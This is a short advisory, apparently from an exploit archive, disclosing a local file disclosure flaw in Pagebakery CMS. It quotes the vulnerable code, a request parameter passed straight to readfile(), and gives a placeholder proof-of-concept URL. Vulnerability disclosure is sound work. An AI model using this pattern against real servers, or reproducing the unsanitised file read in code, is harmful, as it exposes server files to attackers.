Pagebakery CMS < Local File Disclosure

2017.07.05

Shahab Shamsi (IR)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

[-] Title : Pagebakery CMS < Local File Disclosure
[-] Author : Shahab Shamsi
[-] Software Link : https://github.com/Pagebakers/pagebakery.org-cms
[-] Version: N/A
[-] Tested on : [ Windows ]
[-] Category : Webapps
[-] Date : 2017 05 July


===========
Vulnerable page :
===========
/webroot/js/vendors.php


==========
Vulnerable Code :
==========
Line 38 : readfile('../../vendors/javascript/'.$file);
Line 33 : $file = $_GET['file'];



==========
POC URL:
==========
http://localhost:8080/pagebakery-cms/webroot/js/vendors.php?file=[LFD]



=========
Contact Me :
Telegram : @Shahab_Shamsi
Email : info@securityman.org
WebSilte : WwW.iran123.Org

See this note in RAW Version

Vote for this issue:

50%

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

Pagebakery CMS < Local File Disclosure

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Pagebakery CMS < Local File Disclosure

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.